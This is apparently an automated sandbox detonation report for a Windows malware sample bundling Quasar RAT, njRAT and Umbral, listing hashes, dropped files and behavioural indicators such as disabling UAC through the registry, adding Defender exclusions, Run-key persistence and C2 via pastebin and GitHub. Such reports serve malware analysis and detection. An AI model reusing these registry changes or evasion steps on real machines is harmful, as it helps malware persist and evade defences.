| SHA256 | 244e0c80661bc8f95f7cdc2430058cbed53037c7dfbca804609aaae10990e4e4 |
| SHA512 | b36614b0cdabb2fb8f809854202b159f92a7dc0e86d4f863d391acfe28ac472512c08f350b7d8143745575eafa25df893508af88fb2861a2f9c8edd578b78f0c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L6J4GCMD\favicon[1].ico
| MD5 | f3418a443e7d841097c714d69ec4bcb8 |
| SHA1 | 49263695f6b0cdd72f45cf1b775e660fdc36c606 |
| SHA256 | 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770 |
| SHA512 | 82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563 |
memory/1540-6139-0x00000000012F0000-0x0000000001614000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ORLHVJxSJiqt.bat
| MD5 | 7cd9f0ed81ac6fe05eb78182b6e92f13 |
| SHA1 | 469adadd0946b912df1a5ceded0389b47296ca5e |
| SHA256 | 0973a3ff63012b6cef5b018b55ab11f25dce0503b1b400a787d226dd317f21f2 |
| SHA512 | cea3e6d7d2884656ea0c784f8a69d48214ae68bec4da588df584b24209db6447e69f525bf72640b34e663d055d7e9557c2a873f4499d56cd8d491e0cc2de981e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9GP4P3HF\4Kv5U5b1o3f[1].png
| MD5 | a81a5e7f71ae4153e6f888f1c92e5e11 |
| SHA1 | 39c3945c30abff65b372a7d8c691178ae9d9eee0 |
| SHA256 | 2bc7a47889c56ad49f1b8b97385d5a4d212e79bb8a9b30df0665a165f58b273e |
| SHA512 | 1df32349b33f6a6fcb1f8b6093abd737fa0638cdd6e3fd90a7e1852bd0e40bc2633cb4e13c4824fb948d1e012e5cb9eed0b038b121404865495d4e57e123db69 |
memory/912-6255-0x0000000000040000-0x0000000000364000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\jD0d0HUugteK.bat
| MD5 | 910feec4f11dbdef969865431e445035 |
| SHA1 | e692184390c08c8ab3825e2c29ec9800dafe61bb |
| SHA256 | 2e5c1de991e99fe355c2e1b6b3c7cb0af07606c11af1ab367019d6c055e11358 |
| SHA512 | 9bb0de54a43f5471657febee6fd76a60ed155d5f76db4a81ae2d6604488e2b683e2118015d43441cea104083e887e2f6717d76e8a3b40506a51cf5a481b3a279 |
C:\Users\Admin\AppData\Local\Temp\EZyhRilaxK4P.bat
| MD5 | 56e53e075c0c239b6e0894b48eb32a00 |
| SHA1 | 2cd05795364394a3cfdfd6f6cf7ad1b1eddf648f |
| SHA256 | eba4142dd3da2000dda3079fbe02312487becb7a02d4e59be3e52169b7a6ef14 |
| SHA512 | 55938793e568e118218479abb073008b4aa929f92664e20fde724dd4db7ecaee60b9ea7a4cf1a7873bd1e606b8d8baaa5d51fa1f0958c41086199531a56a26ed |
C:\Users\Admin\AppData\Local\Temp\TtFOjjU5RTQ3.bat
| MD5 | 42e1f9853f09310a2c8f4be7169c183c |
| SHA1 | fec36846639a1b09fe2547d6678f95614ff89578 |
| SHA256 | 55801fa3568aff97a69eaee89e6586960d71a185ba197c521890b4c936fe727e |
| SHA512 | 62f54f99621ed8e84448b250d17d0a833dda5e7a85d918496fc974f26625b8c2f40c55ac5fd5eaff83b0f1ee69c8b18dce2bda83ac8517da70674364ef378dca |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-08 09:16
Reported
2024-11-08 09:21
Platform
win10v2004-20241007-en
Max time kernel
152s
Max time network
166s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Njrat family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Umbral
Umbral family
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\the.exe = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
njRAT/Bladabindi
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\1CCF8823482A12F66BA7C629093B98DF77300697\Blob = 0f000000010000001400000067b3a708f1576af8c76f850d49fa5b878ffe45310200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000620035003500380035003200380035002d0033003600370063002d0034006100640061002d0061006100330034002d0065006500380033003100630063003800350063003800320000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000300000001000000140000001ccf8823482a12f66ba7c629093b98df77300697200000000100000000030000308202fc308201e4a00302010202104a3bf5362cc6dd834d64c59090733aa6300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234313130383039313931375a180f32313234313031353039313931375a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dc52dc355f446ca60a7a9674bd866624422fcd4c120bd1e64155d3853c71d0ec5e3f22e9712e297eea95dec6c30548a420b41f4abe40c3613358f28f5100976d1fa19ccb39dfc708cfb52bf32ce934054f77c28d4d987b34f42af4b8cca59b678585616fd85c36f581bfe79da39d1b9cfdc270fada2e36caf60759b6773445998f78502d375686c673a079c1a5087bcfcaa68df4a6151c031e6b69a19c32ef2048a6943808713297fb82fc01fb662feb31e86afe2c57678baaa513ac573626f01602df40e01aa6014c3b2de7c21fca1ab8634a2742473e4d8153485e018cb5c7a4f06dacd5acb90d18e7bace4ec28d2f96ae1bfa4bc49515c8ca159f6602fb710203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e404b424b574745424b0030090603551d1304023000300d06092a864886f70d0101050500038201010092aba6879b3d92d2d30dd09ab1b7db00532b6f7cbb2202d2a54c53b4475a1dafe10549722049f7838664bd7289bfd04dff25db8bb7e1cf41f7d06816d63cfbc49c665fdd82032a1a7b5587e655571788279445dd9ab9f7d41c5e8e457305b0922e6325002ff63f3fc7c6cba72d81edc18c24b8fab93bedcea73aebc4104ed67a755ef6545aed1d68b971036daa12416ac56dbe2ce608af284fc8a2727dbec248a7cca31648fd9ad8981822bf1364ee139db9dbf3cd5dbb6056d4e995307549a527a26f0b7d305cb9a4ff4d345d3468f6985da3adf6b004adafe743230a7f61e58cbc95586069ae2497d64b89da247cc0814b2d4c2b890e2f761c40cc1a74cf73 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Program Files\SubDir\Romilyaa.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Program Files\SubDir\Romilyaa.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Program Files\SubDir\Romilyaa.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Program Files\SubDir\Romilyaa.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Program Files\SubDir\Romilyaa.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\SolaraBootstraper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Program Files\SubDir\Romilyaa.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Program Files\SubDir\Romilyaa.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Program Files\SubDir\Romilyaa.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rj4PrEgwxfGsAttY0T428Muw.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Password Policy Discovery
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\%username%\\Desktop\\t\\a\\bg.png" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\Desktop\Wallpaper = "c:\\temp\\bg.bmp" | C:\Users\Admin\AppData\Local\Temp\3DF9.tmp\CLWCP.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 6924 set thread context of 6700 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\takeown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Rover.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\regmess.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\notepad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cipher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\wimloader.dll | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\SolaraBootstraper.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\freebobux.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cipher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cipher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
